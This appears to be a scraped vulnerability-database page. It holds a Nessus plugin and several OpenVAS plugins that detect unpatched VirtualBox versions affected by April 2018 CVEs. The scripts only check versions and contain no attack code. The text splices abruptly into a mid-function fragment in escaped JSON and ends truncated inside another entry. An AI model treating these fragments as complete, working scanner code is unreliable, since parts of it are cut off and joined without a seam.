ID: OPENSUSE-2018-389.NASL
Type: nessus
Reporter: This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified: 2018-04-24T00:00:00
Description
This update for VirtualBox to version 5.1.36 fixes multiple issues:

Security issues fixed:

- CVE-2018-0739: Unauthorized remote attacker may have caused a hang or frequently repeatable crash (complete DOS)
- CVE-2018-2830: Attacker with host login may have compromised VirtualBox or further system services after interaction with a third user
- CVE-2018-2831: Attacker with host login may have compromised VirtualBox or further system services, allowing read access to some data
- CVE-2018-2835: Attacker with host login may have gained control over VirtualBox and possibly further system services after interacting with a third user
- CVE-2018-2836: Attacker with host login may have gained control over VirtualBox and possibly further system services after interacting with a third user
- CVE-2018-2837: Attacker with host login may have gained control over VirtualBox and possibly further system services after interacting with a third user
- CVE-2018-2842: Attacker with host login may have gained control over VirtualBox and possibly further system services after interacting with a third user
- CVE-2018-2843: Attacker with host login may have gained control over VirtualBox and possibly further system services after interacting with a third user
- CVE-2018-2844: Attacker with host login may have gained control over VirtualBox and possibly further system services after interacting with a third user
- CVE-2018-2845: Attacker with host login may have caused a hang or frequently repeatable crash (complete DOS), and performed unauthorized read and write operations on some VirtualBox accessible data
- CVE-2018-2860: Privileged attacker may have gained control over VirtualBox and possibly further system services

This update also contains all upstream fixes and improvements in the stable 5.1.36 release.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from openSUSE Security Update openSUSE-2018-389.
#
# The text description of this plugin is (C) SUSE LLC.
#
include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(109294);
  script_version("1.5");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  script_cve_id("CVE-2017-3737", "CVE-2017-9798", "CVE-2018-0739", "CVE-2018-2830", "CVE-2018-2831", "CVE-2018-2835", "CVE-2018-2836", "CVE-2018-2837", "CVE-2018-2842", "CVE-2018-2843", "CVE-2018-2844", "CVE-2018-2845", "CVE-2018-2860");

  script_name(english:"openSUSE Security Update : virtualbox (openSUSE-2018-389) (Optionsbleed)");
  script_summary(english:"Check for the openSUSE-2018-389 patch");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote openSUSE host is missing a security update."
  );
  script_set_attribute(
    attribute:"description",
    value:
"This update for VirtualBox to version 5.1.36 fixes multiple issues :
Security issues fixed :
- CVE-2018-0739: Unauthorized remote attacker may have
caused a hang or frequently repeatable crash (complete
DOS)
- CVE-2018-2830: Attacker with host login may have
compromised Virtualbox or further system services after
interaction with a third user
- CVE-2018-2831: Attacker with host login may have
compromised VirtualBox or further system services,
allowing read access to some data
- CVE-2018-2835: Attacker with host login may have gained
control over VirtualBox and possibly further system
services after interacting with a third user
- CVE-2018-2836: Attacker with host login may have gained
control over VirtualBox and possibly further system
services after interacting with a third user
- CVE-2018-2837: Attacker with host login may have gained
control over VirtualBox and possibly further system
services after interacting with a third user
- CVE-2018-2842: Attacker with host login may have gained
control over VirtualBox and possibly further system
services after interacting with a third user
- CVE-2018-2843: Attacker with host login may have gained
control over VirtualBox and possibly further system
services after interacting with a third user
- CVE-2018-2844: Attacker with host login may have gained
control over VirtualBox and possibly further system
services after interacting with a third user
- CVE-2018-2845: Attacker with host login may have caused
a hang or frequently repeatable crash (complete DOS),
and perform unauthorized read and write operation to
some VirtualBox accessible data
- CVE-2018-2860: Privileged attacker may have gained
control over VirtualBox and possibly further system
services
http://www.oracle.com/technetwork/security-advisory/cpuapr2018verbose-
3678108.html
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067
.html#AppendixOVIR
This update also contains all upstream fixes and improvements in the
stable 5.1.36 release."
  );
  # http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html#AppendixOVIR
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?05e0bcf5"
  );
  # http://www.oracle.com/technetwork/security-advisory/cpuapr2018verbose-3678108.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?7eca6abf"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1089997"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Update the affected virtualbox packages."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:python-virtualbox");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-debugsource");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-desktop-icons");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-source");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-tools");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-x11");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-host-source");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-qt");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-vnc");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-websrv");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.3");

  script_set_attribute(attribute:"patch_publication_date", value:"2018/04/23");
  script_set_attribute(attribute:"in_the_news", value:"true");
  script_set_attribute(attribute:"plugin_publication_date", value:"2018/04/24");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"SuSE Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
if (release !~ "^(SUSE42\.3)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "42.3", release);
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
ourarch = get_kb_item("Host/cpu");
if (!ourarch) audit(AUDIT_UNKNOWN_ARCH);
if (ourarch !~ "^(x86_64)$") audit(AUDIT_ARCH_NOT, "x86_64", ourarch);
flag = 0;
if ( rpm_check(release:"SUSE42.3", reference:"python-virtualbox-5.1.36-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"python-virtualbox-debuginfo-5.1.36-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"virtualbox-5.1.36-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"virtualbox-debuginfo-5.1.36-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"virtualbox-debugsource-5.1.36-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"virtualbox-devel-5.1.36-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"virtualbox-guest-desktop-icons-5.1.36-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"virtualbox-guest-kmp-default-5.1.36_k4.4.126_48-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"virtualbox-guest-kmp-default-debuginfo-5.1.36_k4.4.126_48-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"virtualbox-guest-source-5.1.36-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"virtualbox-guest-tools-5.1.36-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"virtualbox-guest-tools-debuginfo-5.1.36-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"virtualbox-guest-x11-5.1.36-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"virtualbox-guest-x11-debuginfo-5.1.36-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"virtualbox-host-kmp-default-5.1.36_k4.4.126_48-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"virtualbox-host-kmp-default-debuginfo-5.1.36_k4.4.126_48-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"virtualbox-host-source-5.1.36-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"virtualbox-qt-5.1.36-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"virtualbox-qt-debuginfo-5.1.36-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"virtualbox-vnc-5.1.36-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"virtualbox-websrv-5.1.36-50.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"virtualbox-websrv-debuginfo-5.1.36-50.1") ) flag++;

if (flag)
{
  if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
  else security_warning(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "python-virtualbox / python-virtualbox-debuginfo / virtualbox / etc");
}
res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-debugsource\", rpm:\"virtualbox-debugsource~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-devel\", rpm:\"virtualbox-devel~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default\", rpm:\"virtualbox-guest-kmp-default~5.1.36_k4.4.126_48~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default-debuginfo\", rpm:\"virtualbox-guest-kmp-default-debuginfo~5.1.36_k4.4.126_48~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-tools\", rpm:\"virtualbox-guest-tools~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-tools-debuginfo\", rpm:\"virtualbox-guest-tools-debuginfo~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-x11\", rpm:\"virtualbox-guest-x11~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-x11-debuginfo\", rpm:\"virtualbox-guest-x11-debuginfo~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-default\", rpm:\"virtualbox-host-kmp-default~5.1.36_k4.4.126_48~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-default-debuginfo\", rpm:\"virtualbox-host-kmp-default-debuginfo~5.1.36_k4.4.126_48~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-qt\", rpm:\"virtualbox-qt~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-qt-debuginfo\", rpm:\"virtualbox-qt-debuginfo~5.1.36~50.1\", 
rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-vnc\", rpm:\"virtualbox-vnc~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-websrv\", rpm:\"virtualbox-websrv~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-websrv-debuginfo\", rpm:\"virtualbox-websrv-debuginfo~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-07-17T14:18:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2836", "CVE-2018-2860", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2845", "CVE-2018-2837", "CVE-2018-0739", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2843"], "description": "The host is installed with Oracle VM\n VirtualBox and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-04-18T00:00:00", "id": "OPENVAS:1361412562310813302", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813302", "type": "openvas", "title": "Oracle VirtualBox Security Updates (apr2018-3678067) 01 - Windows", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle VirtualBox Security Updates (apr2018-3678067) 01 - Windows\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY 
WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:vm_virtualbox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813302\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2018-2860\", \"CVE-2018-0739\", \"CVE-2018-2842\", \"CVE-2018-2843\",\n \"CVE-2018-2844\", \"CVE-2018-2845\", \"CVE-2018-2831\", \"CVE-2018-2830\",\n \"CVE-2018-2837\", \"CVE-2018-2836\", \"CVE-2018-2835\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-04-18 19:09:04 +0530 (Wed, 18 Apr 2018)\");\n script_name(\"Oracle VirtualBox Security Updates (apr2018-3678067) 01 - Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Oracle VM\n VirtualBox and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to multiple\n unspecified errors in 'Core' component of Oracle VM VirtualBox.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to affect confidentiality, availability and integrity via\n unknown vectors.\");\n\n script_tag(name:\"affected\", value:\"VirtualBox versions prior to 5.1.36, 5.2.x\n prior to 5.2.10 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Oracle 
VirtualBox 5.2.10 or\n 5.1.36 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_sun_virtualbox_detect_win.nasl\");\n script_mandatory_keys(\"Oracle/VirtualBox/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nvirtualVer = infos['version'];\npath = infos['location'];\n\nif(virtualVer =~ \"^5\\.2\" && (version_is_less(version:virtualVer, test_version:\"5.2.10\"))){\n fix = \"5.2.10\";\n}\n\nelse if(version_is_less(version:virtualVer, test_version:\"5.1.36\")){\n fix = \"5.1.36\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:virtualVer, fixed_version: fix, install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:18:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2836", "CVE-2018-2860", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2845", "CVE-2018-2837", "CVE-2018-0739", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2843"], "description": "The host is installed with Oracle VM\n VirtualBox and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-04-18T00:00:00", "id": "OPENVAS:1361412562310813303", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813303", "type": "openvas", "title": "Oracle VirtualBox Security Updates (apr2018-3678067) 02 - Linux", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle VirtualBox Security Updates (apr2018-3678067) 02 - Linux\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:vm_virtualbox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813303\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2018-2860\", \"CVE-2018-0739\", \"CVE-2018-2842\", \"CVE-2018-2843\",\n \"CVE-2018-2844\", \"CVE-2018-2845\", \"CVE-2018-2831\", \"CVE-2018-2830\",\n \"CVE-2018-2837\", \"CVE-2018-2836\", \"CVE-2018-2835\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-04-18 19:09:08 +0530 (Wed, 18 Apr 2018)\");\n script_name(\"Oracle VirtualBox Security Updates (apr2018-3678067) 02 - Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Oracle VM\n VirtualBox and is prone to multiple 
vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to multiple\n unspecified errors in 'Core' component of Oracle VM VirtualBox.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to affect confidentiality, availability and integrity via\n unknown vectors.\");\n\n script_tag(name:\"affected\", value:\"VirtualBox versions prior to 5.1.36, 5.2.x\n prior to 5.2.10 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Oracle VirtualBox 5.2.10 or\n 5.1.36 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_sun_virtualbox_detect_lin.nasl\");\n script_mandatory_keys(\"Sun/VirtualBox/Lin/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nvirtualVer = infos['version'];\npath = infos['location'];\n\nif(virtualVer =~ \"^5\\.2\" && (version_is_less(version:virtualVer, test_version:\"5.2.10\"))){\n fix = \"5.2.10\";\n}\n\nelse if(version_is_less(version:virtualVer, test_version:\"5.1.36\")){\n fix = \"5.1.36\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:virtualVer, fixed_version: fix, install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:18:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2836", 
"CVE-2018-2860", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2845", "CVE-2018-2837", "CVE-2018-0739", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2843"], "description": "The host is installed with Oracle VM\n VirtualBox and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-04-18T00:00:00", "id": "OPENVAS:1361412562310813304", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813304", "type": "openvas", "title": "Oracle VirtualBox Security Updates (apr2018-3678067) 03 - MAC OS X", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle VirtualBox Security Updates (apr2018-3678067) 03 - MAC OS X\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:vm_virtualbox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813304\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2018-2860\", \"CVE-2018-0739\", \"CVE-2018-2842\", \"CVE-2018-2843\",\n \"CVE-2018-2844\", \"CVE-2018-2845\", \"CVE-2018-2831\", \"CVE-2018-2830\",\n \"CVE-2018-2837\", \"CVE-2018-2836\", \"CVE-2018-2835\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-04-18 19:09:11 +0530 (Wed, 18 Apr 2018)\");\n script_name(\"Oracle VirtualBox Security Updates (apr2018-3678067) 03 - MAC OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Oracle VM\n VirtualBox and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to multiple\n unspecified errors in 'Core' component of Oracle VM VirtualBox.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to affect confidentiality, availability and integrity via\n unknown vectors.\");\n\n script_tag(name:\"affected\", value:\"VirtualBox versions prior to 5.1.36, 5.2.x\n prior to 5.2.10 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Oracle VirtualBox 5.2.10 or\n 5.1.36 or later. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_oracle_virtualbox_detect_macosx.nasl\");\n script_mandatory_keys(\"Oracle/VirtualBox/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nvirtualVer = infos['version'];\npath = infos['location'];\n\nif(virtualVer =~ \"^5\\.2\" && (version_is_less(version:virtualVer, test_version:\"5.2.10\"))){\n fix = \"5.2.10\";\n}\n\nelse if(version_is_less(version:virtualVer, test_version:\"5.1.36\")){\n fix = \"5.1.36\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:virtualVer, fixed_version: fix, install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-04T16:46:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2836", "CVE-2018-3091", "CVE-2018-2687", "CVE-2018-2860", "CVE-2018-3055", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2698", "CVE-2018-2693", "CVE-2018-2845", "CVE-2018-2690", "CVE-2018-3086", "CVE-2018-2676", "CVE-2017-5715", "CVE-2018-2837", "CVE-2018-3089", "CVE-2018-0739", "CVE-2018-2688", "CVE-2018-3087", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2685", "CVE-2018-3085", "CVE-2018-2843", "CVE-2018-3005", "CVE-2018-3090", "CVE-2018-2686", "CVE-2018-2694", "CVE-2018-2689", "CVE-2018-3088"], "description": "The remote host is missing an update for the ", "modified": "2020-06-03T00:00:00", "published": "2018-08-27T00:00:00", "id": 
"OPENVAS:1361412562310851869", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851869", "type": "openvas", "title": "openSUSE: Security Advisory for kbuild (openSUSE-SU-2018:2524-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851869\");\n 